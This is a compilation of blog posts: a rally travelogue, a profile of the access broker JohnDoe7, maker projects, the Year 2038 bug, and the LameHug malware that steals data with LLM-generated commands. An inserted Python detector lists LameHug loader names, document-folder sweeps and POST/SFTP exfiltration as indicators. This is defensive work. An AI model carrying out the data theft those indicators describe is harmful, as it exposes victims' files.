
First Stop: Istanbul. The Cyberpandino clocks up 5,000 km, between breakdowns and mishaps… but doesn't stop!


Our heroes Matteo Errera and Roberto Zaccardi and the Cyberpandino reached Istanbul after five days on the road and more than 5,000 km clocked up since the departure from Lampedusa, and now they set off again for Cappadocia! An important milestone, but only the beginning of an adventure with roughly another 20,000 km to go (more or less… but who is really counting?) along the most improbable roads on the planet.

The first real challenge came in the heart of Maslak, Istanbul's mechanics' district, where a fuel leak from the tank forced the crew into an unplanned technical stop. With help from the guys at @exclusivegaragetr, the leak was plugged and the engine was ready to roar again. At least until the next mishap, because these days there seems to be no shortage of them.

From Turkey into the wildest hinterland, the Cyberpandino kept up its run among lunar craters, ghost villages and roads that do not even exist on the maps.

So far the little Panda has faced a veritable blacklist of failures: a burst fuel hose, a fuel tank that unscrews itself, a broken crankshaft pulley, a filter clogged by petrol cut with water and, so as not to miss anything, a wrecked intake manifold hose. But our Magic team, Matteo Errera and Roberto Zaccardi, don't care: they press on with great determination.

And as if that were not enough, after a long night at the border between endless waits, checks and undrinkable coffee, the Cyberpandino finally arrived in Turkey. It now has a new travelling companion on board: @jonny_pickup, an English reporter and videomaker who does not speak a word of Italian, ready to capture every moment of this surreal race. More heads on board also means more backpacks to squeeze into the boot, but the old Panda keeps holding up with a mechanical dignity all its own.

The next big step will be the border with Russia, planned for 27 July. Until then the journey continues, among mishaps, spare parts and breathtaking landscapes. Because the Mongol Rally is not just a race: it is an experiment in madness on wheels, where even breakdowns become stories to tell. And the Cyberpandino, despite everything, never gives up.

Meanwhile, the Cyberpandino is becoming more and more of a travelling home. They parked on the shores of a lake so remote in Turkey that even the camels asked for directions. An exclusive location for true explorers… or for those who take the wrong road with conviction.

Because this is the Mongol Rally: a start, a distant finish line… and in between, only roads to invent and adventures to live.

The Cyberpandino pulled out its whole camping arsenal in pure "Panda-luxe" style: the side awning that goes up in five minutes, the 1500W power station to run lights and air conditioning (because inside it gets close to 40°, practically a hammam with more mosquitoes), satellite wifi to stay connected even in the middle of nowhere… and of course pasta, because you can take the Italian out of Italy, but not the pot.

Now they are heading for Georgia, maybe Armenia. Will the Cyberpandino manage to convince customs that it is not a low-cost spaceship that landed in Anatolia by mistake?

Stay tuned: the road is long, the tent is still crooked and the pasta… almost ready.

The article First Stop: Istanbul. The Cyberpandino clocks up 5,000 km, between breakdowns and mishaps… but doesn't stop! comes from il blog della sicurezza informatica.


Discovering the IAB JohnDoe7: access for sale from the man in the street


We continue our series of articles on Initial Access Brokers with a piece on JohnDoe7 (also known as LORD1) who, as we will see later, uses a name/moniker that evokes cinema or the legal world in the United States.

Exploits for 1-day vulnerabilities


KELA Cyber has observed a constant supply of exploits for 1-day vulnerabilities, confirming that IABs, like other actors, are interested in hitting companies that have not patched their environment promptly. In the figure here, on Exploit in October 2020, LORD1 offers an RCE and LPE exploit with a price starting at 5,000 dollars.
LORD1 offers one-day exploits (RCE, LPE), priced from $5,000

The case of the MOVEit Transfer software


In June 2023, johndoe7 aka LoRD1 offered on XSS and Exploit a custom malicious script to exploit the Progress MOVEit Transfer vulnerability (CVE-2023-34362). In May 2023, the CL0P ransomware group had targeted Progress Software's MOVEit Transfer, commonly used by organizations to manage file transfer operations. They exploited the zero-day SQL injection vulnerability (CVE-2023-34362) to infiltrate MOVEit Transfer web applications and gain unauthorized access to the stored databases. This could suggest a link between johndoe7 and the CL0P gang…

In the next example from the XSS and Exploit forums, the malicious actors "0x90" and "Present" express their interest in buying exploits for CVE-2023-3519 (RCE on Citrix) and CVE-2022-24527 (LPE on Microsoft Connected Cache).

SOCRadar report on attacks against crypto/NFT


According to a SOCRadar report, LORD1 is very active in compromising credentials related to the cryptocurrency and NFT world; analyses by SOCRadar's research team reveal that most of the roughly 1,700 unique Dark Web threats detected since 2021 concern the sale of compromised user data on a global scale. Thus the malicious actors targeting the cryptocurrency and NFT sector represent a global threat to all users.

The most widespread threat in the cryptocurrency and NFT sector is the compromise and subsequent sale of the personal information of users in the sector on Dark Web forums.

In the chart above, taking the total number of credential-compromise cases analysed by SOCRadar in the period as 100, each segment shows the percentage contribution attributed to each malicious actor: LORD1 ranks fifth in the TOP 10 with a contribution of 14 percent.

Scenarios of other CVEs exploited by the IAB


ATLASSIAN BITBUCKET COMMAND INJECTION (CVE-2022-36804)

Disclosed in August 2022, CVE-2022-36804 is a command injection vulnerability affecting multiple API endpoints of Bitbucket Server. Using this vulnerability, attackers with access to a public repository or with read permissions on a private Bitbucket repository can execute arbitrary code by sending a malicious HTTP request.

FORTINET: AUTHENTICATION BYPASS VULNERABILITY (CVE-2022-40684)

Disclosed in September 2022, this vulnerability allows an unauthenticated attacker to perform operations on the administrative interface of the FORTINET appliance via specially crafted HTTP or HTTPS requests, through an authentication bypass using an alternate path or channel [CWE-288] in Fortinet FortiOS versions 7.2.0 through 7.2.1 and 7.0.0 through 7.0.6, FortiProxy versions 7.2.0 and 7.0.0 through 7.0.6, and FortiSwitchManager versions 7.2.0 and 7.0.0.

XSS Forum


Other traces of Johndoe7 from 2022 on the XSS forum ( xss.ist/forums/104 )

SEVEN / SE7EN


Trivia: "John Doe" is the name of the villain of the film SE7EN

villains.fandom.com/it/wiki/Jo…

In the USA the name John Doe is used for a victim or defendant who is unknown or who is to remain anonymous in a legal case. It is also the name assigned by default to unidentified bodies.

In Italy it is the equivalent of Ignoto or NN (from the Latin Nomen Nescio).

Nota bene on 1-day: what is a 1-day vulnerability?


1-day vulnerabilities are known vulnerabilities for which a remediation patch or a mitigation is available but has not yet been applied. The term "one day" refers to the period between disclosure of the vulnerability and application of the patch to the affected systems.

These vulnerabilities are sometimes called "n-day", since the period is often much longer than one day, given that the mean time to patch (MTTP) is usually between 60 and 150 days.

Unfortunately, exploitation of 1-day vulnerabilities is often accelerated by the release of PoC (Proof-of-Concept) exploit code before the affected users have had time to patch their systems. This practice seems to have worsened since some cybersecurity researchers try to show off their technical skills by creating PoCs, despite the damage that results.

While more sophisticated threat actors reverse-engineer a patch to understand which problem it was meant to fix and then develop their own exploits based on their findings, the less technical ones adopt the publicly available PoC code. In this way the vulnerability can be exploited by malicious actors with lower technical skills who would otherwise not have had this capability without external assistance.

A recent and relevant example of a one-day vulnerability is CVE-2024-1708, an authentication bypass flaw, and CVE-2024-1709, a path traversal flaw, in ConnectWise ScreenConnect servers: just one day after the vulnerabilities were announced, several researchers released PoC exploit code and the related technical details. This code, combined with the ease of identifying vulnerable ScreenConnect instances through online web scanners, led to mass exploitation and the distribution of ransomware and other malware on unpatched servers.
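The 1-day/n-day definition above (disclosure date, PoC date, patch date) is easy to turn into a small exposure tracker for your own asset inventory. This is an added example, not code from the article or from any of the cited reports; the CVE identifiers are the ones named in the text, while the asset names and every date are constructed placeholders.

```python
from dataclasses import dataclass
from datetime import date
from typing import Optional

# Typical mean time to patch quoted in the text: 60 to 150 days.
MTTP_RANGE_DAYS = (60, 150)
# Reference "today" for the constructed sample below.
TODAY = date(2025, 7, 22)


@dataclass
class Exposure:
    """One vulnerability on one of our own assets (constructed record)."""
    cve: str
    asset: str
    disclosed: date                 # public disclosure of the vulnerability
    poc_published: Optional[date]   # public PoC exploit code, if any
    patched: Optional[date]         # when we applied the patch; None = still open


def exposure_days(e: Exposure, today: date) -> int:
    """Days from disclosure to patch, or to today if still unpatched."""
    return ((e.patched or today) - e.disclosed).days


def classify(e: Exposure, today: date) -> str:
    """'unpatched', 'same-day', '1-day' or 'n-day', following the text's definition."""
    if e.patched is None:
        return "unpatched"
    days = exposure_days(e, today)
    if days <= 0:
        return "same-day"
    return "1-day" if days == 1 else "n-day"


def poc_before_patch(e: Exposure, today: date) -> bool:
    """True when public exploit code existed while the asset was still unpatched."""
    if e.poc_published is None:
        return False
    return e.poc_published < (e.patched or today)


def within_typical_mttp(days: int) -> bool:
    lo, hi = MTTP_RANGE_DAYS
    return lo <= days <= hi


def prioritize(records, today):
    """Rank: open items first, then items where a PoC beat the patch, then by window length."""
    rows = []
    for e in records:
        days = exposure_days(e, today)
        rows.append({
            "cve": e.cve, "asset": e.asset, "days": days,
            "class": classify(e, today),
            "poc_before_patch": poc_before_patch(e, today),
            "within_mttp": within_typical_mttp(days),
        })
    rows.sort(key=lambda r: (r["class"] == "unpatched", r["poc_before_patch"], r["days"]),
              reverse=True)
    return rows


# Constructed sample inventory: CVEs from the article, asset names and dates are illustrative only.
SAMPLE = [
    Exposure("CVE-2024-1709", "screenconnect-01", date(2024, 2, 19), date(2024, 2, 20), None),
    Exposure("CVE-2023-34362", "moveit-01", date(2023, 5, 31), date(2023, 6, 9), date(2023, 6, 1)),
    Exposure("CVE-2022-40684", "fortigate-edge", date(2022, 9, 30), date(2022, 10, 13), date(2023, 1, 15)),
]

if __name__ == "__main__":
    for row in prioritize(SAMPLE, TODAY):
        print(row)
```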

Conclusion


In this article of the series on initial access brokers we have seen how credential theft can also occur through attacks that exploit RCE and LPE vulnerabilities, and how essential it is to apply patches and remediations as soon as possible… So let us recall some of the best practices mentioned earlier, to be ready for every eventuality:

  • Keep systems constantly updated
  • Continuous monitoring and threat detection
  • Strong access controls / use of Multi-Factor Authentication
  • Employee training and awareness
  • Network segmentation/micro-segmentation


References


KelaCyber 2022 Q2 Report kelacyber.com/wp-content/uploa…

Outpost24 IAB Report outpost24.com/wp-content/uploa…

SOCRadar report socradar.io/wp-content/uploads…

Cyble underground report osintme.com/wp-content/uploads…

XSS Forum xss.ist/forums/104

Seven (Film, 1995) it.wikipedia.org/wiki/Seven

The article Discovering the IAB JohnDoe7: access for sale from the man in the street comes from il blog della sicurezza informatica.


Nylon-Like TPU Filament: Testing CC3D’s 72D TPU


Another entry in the world of interesting FDM filaments comes courtesy of CC3D with their 72D TPU filament, with [Dr. Igor Gaspar] putting it to the test in his recent video. The use of the Shore hardness D scale rather than the typical A scale is a strong indication that something is different about this TPU. The manufacturer claims ‘nylon-like’ performance, which should give this TPU filament much more hardness and resistance to abrasion. The questions are whether this filament lives up to these promises, and whether it is at all fun to print with.
The CC3D 72D TPU filament used to print a bicycle's handlebar. (Credit: My Tech Fun, YouTube)
TPU is of course highly hydrophilic, so keeping the filament away from moisture is essential. Printing temperature is listed on the spool as 225 – 245°C, and the filament is very bendable but not stretchable. For the testing a Bambu Lab X-1 Carbon was used, with the filament loaded directly from the filament dryer. After an overnight print session resulted in spaghetti due to warping, it was found that generic TPU settings at 240°C with some more nylon-specific tweaks seemed to give the best results, with other FDM printers also working well that way.

The comparison was against Bambu Lab’s 68D TPU for AMS. Most noticeable is that the 72D TPU easily suffers permanent deformation, while being much more wear resistant than e.g. PLA. That said, it does indeed seem to perform more like polyamide filaments, making it perhaps an interesting alternative there. Although there’s some confusion about whether this TPU filament has polyamide added to it, it seems to be pure TPU, just like the Bambu Lab 68D filament.

youtube.com/embed/158prgcHcTE?…


hackaday.com/2025/07/22/nylon-…


The Hall-Héroult Process on a Home Scale


A cylindrical red furnace is in the center of the image. To the left of it is a black power supply. A stand is in front of the furnace, with an arm extending over the furnace. To the right of the furnace, a pair of green-handled crucible tongs sit on an aluminium pan.

Although Charles Hall conducted his first successful run of the Hall-Héroult aluminium smelting process in the woodshed behind his house, it has ever since remained mostly out of reach of home chemists. It does involve electrolysis at temperatures above 1000 ℃, and can involve some frighteningly toxic chemicals, but as [Maurycy Z] demonstrates, an amateur can now perform it a bit more conveniently than Hall could.

[Maurycy] started by finding a natural source of aluminium, in this case aluminosilicate clay. He washed the clay and soaked it in warm hydrochloric acid for two days to extract the aluminium as a chloride. This also extracted quite a bit of iron, so [Maurycy] added sodium hydroxide to the solution until both aluminium and iron precipitated as hydroxides, added more sodium hydroxide until the aluminium hydroxide redissolved, filtered the solution to remove iron hydroxide, and finally added hydrochloric acid to the solution to precipitate aluminium hydroxide. He heated the aluminium hydroxide to about 800 ℃ to decompose it into the alumina, the starting material for electrolysis.

To turn this into aluminium metal, [Maurycy] used molten salt electrolysis. Alumina melts at a much higher temperature than [Maurycy]’s furnace could reach, so he used cryolite as a flux. He mixed this with his alumina and used an electric furnace to melt it in a graphite crucible. He used the crucible itself as the cathode, and a graphite rod as an anode. He does warn that this process can produce small amounts of hydrogen fluoride and fluorocarbons, so that “doing the electrolysis without ventilation is a great way to poison yourself in new and exciting ways.” The first run didn’t produce anything, but on a second attempt with a larger anode, 20 minutes of electrolysis produced 0.29 grams of aluminium metal.

[Maurycy]’s process follows the industrial Hall-Héroult process quite closely, though he does use a different procedure to purify his raw materials. If you aren’t interested in smelting aluminium, you can still cast it with a microwave oven.


hackaday.com/2025/07/22/the-ha…


Video Tape Hides Video Player


While it might not be accurate to say VHS is dead, it’s certainly not a lively format. It continues on in undeath thanks to dedicated collectors and hobbyists, some of whom may be tempted to lynch Reddit user [CommonKingfisher] for embedding a video player inside a VHS tape.
Miniaturization in action. The video player probably cost about the same as the original VHS when you account for inflation.
The hack started with a promotional video card via AliExpress, which is a cheap enough way to get a tiny LCD and an MP4-playing micro. As you can see, there was plenty of room in the tape for the guts of this. The tape path is obviously blocked, so the tape is not playable in this format. [CommonKingfisher] claims the hack is “reversible” but since he cut a window for the LCD out of the casing of the cassette, that’s going to be pretty hard to undo. On the other hand, the ultrasonic cutter he used did make a very clean cut, and that would help with reversibility.

The fact that the thing is activated by a magnetic sensor makes us worry for the data on that tape, too, whether or not the speaker is a piezo. Ultimately it doesn’t really matter; in no universe was this tape the last surviving copy of “The Matrix”, and it’s a lot more likely this self-playing “tape” gets watched than the VHS was going to be. You can watch it yourself in the demo video embedded below.

VHS nostalgia around here usually involves replicating the tape experience, rather than repurposing the tape. We’re grateful to [George Graves] for the tip. Tips of all sorts are welcome on our friendly neighborhood tips line.

youtube.com/embed/BYrY3nFrsho?…


hackaday.com/2025/07/22/video-…


2025 One Hertz Challenge: A 555, but not as we know it


We did explicitly ask for projects that use a 555 timer for the One Hertz Challenge, but we weren’t expecting the 555 to be the project. Yet, here we are, with [matt venn]’s Open Source 1Hz Blinky, that blinks a light with a 555 timer… but not one you’d get from Digikey.

Hooking a 555 to blink an LED at one hertz is a bog-simple, first-electronics-project type of exercise, unless you have to make the 555 first. Rather than go big, as we have seen before, [matt venn] goes very small, with a 555 implemented on a tiny sliver of Tiny Tapeout 6.

We’ve covered projects using that tapeout before, but in case you missed it, Tiny Tapeout gives space to anyone to produce ASICs on custom silicon using an open Process Design Kit, and we have [matt venn] to thank for it. The Tiny Tapeout implementation of the 555 was actually designed by [Vincent Fusco].

Of course wiring it up is a bit more complicated than dropping in a 555 timer to the circuit: the Tiny Tapeout ASIC must be configured to use that specific project using its web interface. There’s a demo video embedded below, with some info about the project– it’s not just a blinking LED, so it’s worth seeing. The output isn’t exactly One Hertz, so it might not get the nod in the Timelord category, but it’s going to be a very strong competitor for other 555-based projects– of which we could really use more, hint-hint. You’ve got until August 19th, if you think you can use a 555 to do something more interesting than blink an LED.

2025 Hackaday One Hertz Challenge

youtube.com/embed/QrB6msn3UzM?…


hackaday.com/2025/07/22/2025-o…


2025 One-Hertz Challenge: Pokémon Alarm Clock Tells You It’s Time to Build the Very Best


We’ve all felt the frustration of cheap consumer electronics — especially when they aren’t actually cheap. How many of us have said “Who designed this crap? I could do better with an Arduino!” while resisting the urge to drop that new smart doorbell in the garbage disposal?

It’s an all-too familiar thought, and when it passed through [Mathieu]’s head while he was resetting the time and changing the batteries in his son’s power-hungry Pokémon alarm clock for the umpteenth time, he decided to do something about it.

The only real design requirement, imposed by [Mathieu]’s son, was that the clock’s original shell remained. Everything else, including the controller and “antique” LCD, could go. He ripped out the internals and installed an ESP32, allowing the clock to automatically sync to network time in the event of power loss. The old-school LCD was replaced with a modern, full-color TFT LCD which he scored on AliExpress for a couple of Euros.

Rather than just showing the time, the new display sports some beautiful pixel art by Woostarpixels, which [Mathieu] customized to have day and nighttime versions, even including the correct moon phase. He really packed as much into the ESP32 as possible, using 99.6% of its onboard 4 MB of flash. Code is on GitHub for the curious. All in all, the project is a multidisciplinary work of art, and it looks well-built enough to be enjoyed for years to come.

youtube.com/embed/mHJeMg9Hzjg?…

2025 Hackaday One Hertz Challenge


hackaday.com/2025/07/22/2025-o…


The Epochalypse: It’s Y2K, But 38 Years Later


Picture this: it’s January 19th, 2038, at exactly 03:14:07 UTC. Somewhere in a data center, a Unix system quietly ticks over its internal clock counter one more time. But instead of moving forward to 03:14:08, something strange happens. The system suddenly thinks it’s December 13th, 1901. Chaos ensues.

Welcome to the Year 2038 problem. It goes by a number of other fun names—the Unix Millennium Bug, the Epochalypse, or Y2K38. It’s another example of a fundamental computing limit that requires major human intervention to fix.

By and large, the Y2K problem was dealt with ahead of time for critical systems. An amusing example of a Y2K failure was this sign at the École Centrale de Nantes, pictured on January 3, 2000. Credit: Bug de l’an 2000, CC BY-SA 3.0
The Y2K problem was simple enough. Many computing systems stored years as two-digit figures, often for the sake of minimizing space needed on highly-constrained systems, back when RAM and storage, or space on punch cards, were strictly limited. This generally limited a system to understanding dates from 1900 to 1999; when storing the year 2000 as a two-digit number, it would effectively appear as 1900 instead. This promised to cause chaos in all sorts of ways, particularly in things like financial systems processing transactions in the year 2000 and onwards.

The problem was first identified in 1958 by Bob Bemer, who was working on longer time scales with genealogical software. Awareness slowly grew through the 1980s and 1990s as the critical date approached and things like long-term investment bonds started to butt up against the year 2000. Great effort was expended to overhaul and update important computer systems to enable them to store dates in a fashion that would not loop around back to 1900 after 1999.

Unlike Y2K, which was largely about how dates were stored and displayed, the 2038 problem is rooted in the fundamental way Unix-like systems keep track of time. Since the early 1970s, Unix systems have measured time as the number of seconds elapsed since January 1st, 1970, at 00:00:00 UTC. This moment in time is known as the “Unix epoch.” Recording time in this manner seemed like a perfectly reasonable approach at the time. It gave systems a simple, standardized way to handle timestamps and scheduled tasks.

The trouble is that this timestamp was traditionally stored as a signed 32-bit integer. Thanks to the magic of binary, a signed 32-bit integer can represent values from -2,147,483,648 to 2,147,483,647. When you’re counting individual seconds, that gives you about plus and minus 68 years either side of the epoch date. Do the math, and you’ll find that 2,147,483,647 seconds after January 1st, 1970 lands you at 03:14:07 UTC on January 19th, 2038. That’s the final time that can be represented using the 32-bit signed integer, having started at the Unix epoch.
The Unix time integer immediately prior to overflow.
What happens next isn’t pretty. When that counter tries to increment one more time, it overflows. In two’s complement arithmetic, the most significant bit is the sign bit. Thus, the time stamp rolls over from 2,147,483,647 to -2,147,483,648. That translates to December 13th, 1901. In January 2038, this will be roughly 136 years in the past.
Unix time after the 32-bit signed integer has overflowed.
For an unpatched system using a signed 32-bit integer to track Unix time, the immediate consequences could be severe. Software could malfunction when trying to calculate time differences that suddenly span more than a century in the wrong direction, and logs and database entries could quickly become corrupted as operations are performed on invalid dates. Databases might reject “historical” entries, file systems could become confused about which files are newer than others, and scheduled tasks might cease to run or run at inappropriate times.
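The rollover described above can be reproduced without waiting for 2038 by forcing a timestamp through a signed 32-bit field. This is an added example, not code from the article: it emulates the two's-complement wrap, renders the boundary instants, and shows that a naive "add 30 years" computed today already lands past the limit.

```python
import struct
from datetime import datetime, timedelta, timezone

EPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)
INT32_MAX = 2**31 - 1      # 2,147,483,647
INT32_MIN = -2**31         # -2,147,483,648


def store_as_int32(seconds: int) -> int:
    """Emulate writing `seconds` into a signed 32-bit time_t field and reading it back.
    Only the low 32 bits survive; reinterpreting them as signed is the two's-complement wrap."""
    raw = struct.pack("<I", seconds & 0xFFFFFFFF)
    return struct.unpack("<i", raw)[0]


def to_utc(seconds: int) -> str:
    """Render a Unix timestamp as an ISO-8601 UTC string (Python ints do not overflow here)."""
    return (EPOCH + timedelta(seconds=seconds)).isoformat()


def check_timestamp(seconds: int) -> dict:
    """Compare the intended instant with what a 32-bit field would actually hold."""
    stored = store_as_int32(seconds)
    return {"intended": to_utc(seconds), "stored": to_utc(stored), "corrupted": stored != seconds}


def plus_years(seconds: int, years: int) -> int:
    """Naive 'add N years' as a scheduler or loan calculator might do it (365-day years)."""
    return seconds + years * 365 * 86400


def unix_seconds(dt: datetime) -> int:
    return int((dt - EPOCH).total_seconds())


if __name__ == "__main__":
    print(check_timestamp(INT32_MAX))        # last representable instant, not corrupted
    print(check_timestamp(INT32_MAX + 1))    # wraps to 1901-12-13 20:45:52 UTC
    start = unix_seconds(datetime(2025, 1, 1, tzinfo=timezone.utc))
    print(check_timestamp(plus_years(start, 30)))  # a 30-year term computed today already breaks
```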

This isn’t just some abstract future problem. If you grew up in the 20th century, it might sound far off—but 2038 is just 13 years away. In fact, the 2038 bug is already causing issues today. Any software that tries to work with dates beyond 2038—such as financial systems calculating 30-year mortgages—could fall over this bug right now.
In 2012, NetBSD 6.0 introduced 64-bit Unix time across both 32-bit and 64-bit architectures. There is also a binary compatibility layer for running older applications, though they will still suffer the year 2038 problem internally. Credit: NetBSD changelog
The obvious fix is to move from 32-bit to 64-bit timestamps. A 64-bit signed integer can represent timestamps far into the future—roughly 292 billion years in fact, which should cover us until well after the heat death of the universe. Until we discover a solution for that fundamental physical limit, we should be fine.

Indeed, most modern Unix-based operating systems have already made this transition. Linux moved to 64-bit time_t values on 64-bit platforms years ago, and since version 5.6 in 2020, it supports 64-bit timestamps even on 32-bit hardware. OpenBSD has used 64-bit timestamps since May 2014, while NetBSD made the switch even earlier in 2012.

Most other modern Unix filesystems, C compilers, and database systems have switched over to 64-bit time by now. With that said, some have used hackier solutions that kick the can down the road rather than fixing the problem for all of foreseeable time. For example, the ext4 filesystem uses a complicated timestamping system involving nanoseconds that runs out in 2446. XFS does a little better, but it’s only good up to 2486. Meanwhile, Microsoft Windows uses its own 64-bit system tracking 100-nanosecond intervals since 1 January 1601. This will overflow as soon as the year 30,828.

The challenge isn’t just in the operating systems, though. The problem affects software and embedded systems, too. Most things built today on modern architectures will probably be fine where the Year 2038 problem is concerned. However, things that were built more than a decade ago that were intended to run near-indefinitely could be a problem. Enterprise software, networking equipment, or industrial controllers could all trip over the Unix date limit come 2038 if they’re not updated beforehand. There are also obscure dependencies and bits of code out there that can cause even modern applications to suffer this problem if you’re not looking out for them.
In 2022, a coder called Silent identified a code snippet that was reintroducing the Year 2038 bug to new software. Credit: Silent’s blog via screenshot
The real engineering challenge lies in maintaining compatibility during the transition. File formats need updating and databases must be migrated without mangling dates in the process. For systems in the industrial, financial, and commercial fields where downtime is anathema, this can be very challenging work. In extreme cases, solving the problem might involve porting a whole system to a new operating system architecture, incurring huge development and maintenance costs to make the changeover.

The 2038 problem is really a case study in technical debt and the long-term consequences of design decisions. The Unix epoch seemed perfectly reasonable in 1970 when 2038 felt like science fiction. Few developing those systems thought a choice made back then would have lasting consequences over 60 years later. It’s a reminder that today’s pragmatic engineering choices might become tomorrow’s technical challenges.

The good news is that most consumer-facing systems will likely be fine. Your smartphone, laptop, and desktop computer almost certainly use 64-bit timestamps already. The real work is happening in the background—corporate system administrators updating server infrastructure, embedded systems engineers planning obsolescence cycles, and software developers auditing code for time-related assumptions. The rest of us just get to kick back and watch the (ideally) lack of fireworks as January 19, 2038 passes us by.


hackaday.com/2025/07/22/the-ep…


LameHug arrives: the malware that uses AI to steal data on Windows systems


The new LameHug malware family uses a Large Language Model (LLM) to generate the commands it runs on compromised Windows systems. As reported by Bleeping Computer, LameHug is written in Python and uses the Hugging Face API to interact with the Qwen 2.5-Coder-32B-Instruct LLM, which can generate commands from the prompts it is given. Note that using Hugging Face's infrastructure can help keep the communications covert and allow the attack to go unnoticed for longer.

This model, created by Alibaba Cloud, is open source and designed specifically for code generation, reasoning and following programming instructions. It can convert natural-language descriptions into executable code (in several languages) or shell commands. LameHug was discovered on 10 July this year, when employees of Ukrainian executive authorities received malicious emails sent from hacked accounts.

The emails contained a ZIP archive with the LameHug loader, disguised as the files Attachment.pif, AI_generator_uncensored_Canvas_PRO_v0.9.exe and image.py. On infected systems, LameHug's job was to run commands for reconnaissance and data theft, generated dynamically through requests to the LLM.
Prompt for command generation
The collected system information was saved to a text file (info.txt), and the malware recursively searched for documents in folders such as Documents, Desktop and Downloads, then transmitted the collected data to its operators via SFTP or HTTP POST requests. The publication stresses that LameHug is the first documented malware that uses an LLM to carry out malicious activity.
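The behaviour described above (loader file names, a non-browser process querying an LLM API, a sweep of Documents/Desktop/Downloads, then an outbound POST or SFTP session) can be turned into a simple host-level detection. This is an added example, not code from the article or from any vendor: the loader names and swept folders come from the text, while the LLM API host suffix, the allowlist of expected LLM clients, the sweep threshold and the sample telemetry are constructed assumptions.

```python
from collections import defaultdict

# Indicators taken from the write-up: the three loader file names and the folders swept for documents.
LOADER_NAMES = {"attachment.pif", "ai_generator_uncensored_canvas_pro_v0.9.exe", "image.py"}
SWEPT_FOLDERS = ("\\documents\\", "\\desktop\\", "\\downloads\\")
# Assumptions (not from the article): the LLM API host suffix, the processes expected to talk to it,
# and how many document reads by one process count as a "sweep".
LLM_API_HOST_SUFFIX = "huggingface.co"
EXPECTED_LLM_CLIENTS = {"chrome.exe", "firefox.exe", "code.exe"}
SWEEP_THRESHOLD = 5


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyse(events):
    """Walk EDR-style events for one host; return {pid: [reasons]} for suspicious processes.

    Constructed event shapes:
      {"type": "process",  "pid", "image"}
      {"type": "netconn",  "pid", "image", "dest", "port", "method"}
      {"type": "fileread", "pid", "image", "path"}
    """
    reasons = defaultdict(list)
    llm_seen, exfil_seen = set(), set()
    sweep_count = defaultdict(int)
    for ev in events:
        pid, image = ev["pid"], _basename(ev["image"])
        if ev["type"] == "process" and image in LOADER_NAMES:
            reasons[pid].append(f"known LameHug loader name: {image}")
        elif ev["type"] == "netconn":
            dest = ev["dest"].lower()
            if dest.endswith(LLM_API_HOST_SUFFIX):
                llm_seen.add(pid)
                if image not in EXPECTED_LLM_CLIENTS:
                    reasons[pid].append(f"{image} contacted LLM API host {dest}")
            elif ev.get("method") == "POST" or ev.get("port") == 22:
                # outbound HTTP POST or SFTP after a document sweep is the exfil channel described
                if sweep_count[pid] >= SWEEP_THRESHOLD:
                    exfil_seen.add(pid)
        elif ev["type"] == "fileread":
            p = ev["path"].replace("/", "\\").lower()
            if any(f in p for f in SWEPT_FOLDERS):
                sweep_count[pid] += 1
                if sweep_count[pid] == SWEEP_THRESHOLD:
                    reasons[pid].append(f"{image} swept user document folders ({SWEEP_THRESHOLD}+ reads)")
    for pid in llm_seen & exfil_seen:
        reasons[pid].append("full chain: LLM query -> document sweep -> outbound POST/SFTP")
    return dict(reasons)


# Constructed sample telemetry: pid 4242 follows the described chain; pid 900 is a browser using the same API.
_LOADER = r"C:\Users\user\AppData\Local\Temp\Attachment.pif"
SAMPLE_EVENTS = [
    {"type": "process", "pid": 4242, "image": _LOADER},
    {"type": "netconn", "pid": 4242, "image": _LOADER, "dest": "api-inference.huggingface.co", "port": 443, "method": "POST"},
    {"type": "fileread", "pid": 4242, "image": _LOADER, "path": r"C:\Users\user\Documents\budget.xlsx"},
    {"type": "fileread", "pid": 4242, "image": _LOADER, "path": r"C:\Users\user\Documents\notes.docx"},
    {"type": "fileread", "pid": 4242, "image": _LOADER, "path": r"C:\Users\user\Desktop\plan.pdf"},
    {"type": "fileread", "pid": 4242, "image": _LOADER, "path": r"C:\Users\user\Downloads\scan.pdf"},
    {"type": "fileread", "pid": 4242, "image": _LOADER, "path": r"C:\Users\user\Downloads\report.txt"},
    {"type": "netconn", "pid": 4242, "image": _LOADER, "dest": "203.0.113.7", "port": 22, "method": None},
    {"type": "netconn", "pid": 900, "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "dest": "huggingface.co", "port": 443, "method": "GET"},
]

if __name__ == "__main__":
    for pid, why in analyse(SAMPLE_EVENTS).items():
        print(pid, why)
```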

We are increasingly seeing a worrying integration between malware and artificial intelligence, which makes cyber threats more sophisticated, flexible and hard to detect. Using Large Language Models as "engines" to generate malicious commands in real time lets attackers adapt quickly, diversify their attack techniques and reduce detectability by traditional defence systems.

LameHug is a clear example of this new generation of threats: malware that not only automates malicious activity but can also "reason" and respond dynamically to input, harnessing the power of LLMs. A phenomenon that marks the start of a new phase in cyber threats, in which AI is not just a defensive tool but becomes an integral, active part of cyber criminals' offensive arsenal.

The article LameHug arrives: the malware that uses AI to steal data on Windows systems comes from il blog della sicurezza informatica.


USB-C-ing All The Things


Wall warts. Plug mounted power supplies that turn mains voltage into low voltage DC on a barrel jack to power a piece of equipment. We’ve all got a load of them for our various devices, most of us to the extent that it becomes annoying. [Mikeselectricstuff] has the solution, in the shape of a USB-C PD power supply designed to replace a barrel jack socket on a PCB.

The video below provides a comprehensive introduction to the topic before diving into the design. The chip in question is the CH224K, and he goes into detail on ordering the boards for yourself. As the design files are freely available, we wouldn’t be surprised if they start turning up from the usual suppliers before too long.

We like this project and we can see that it would be useful, after all it’s easy to end up in wall wart hell. We’ve remarked before that USB-C PD is a new technology done right, and this is the perfect demonstration of its potential.

youtube.com/embed/BElU9LPbaA8?…


hackaday.com/2025/07/22/usb-c-…


Power Grid Stability: From Generators to Reactive Power


It hasn’t been that long since humans figured out how to create power grids that integrated multiple generators and consumers. Ever since AC won the battle of the currents, grid operators have had to deal with the issues that come with using AC instead of the far less complex DC. Instead of simply targeting a constant voltage, generators have to synchronize with the frequency of the alternating current as it cycles between positive and negative current many times per second.

Complicating matters further, the transmission lines between generators and consumers, along with any kind of transmission equipment on the lines, add their own inductive, capacitive, and resistive properties to the system before the effects of consumers are even tallied up. The result is phase shifts between voltage and current that have to be managed by controlling the reactive power, lest frequency oscillations and voltage swings result in a complete grid blackout.

Flowing Backwards


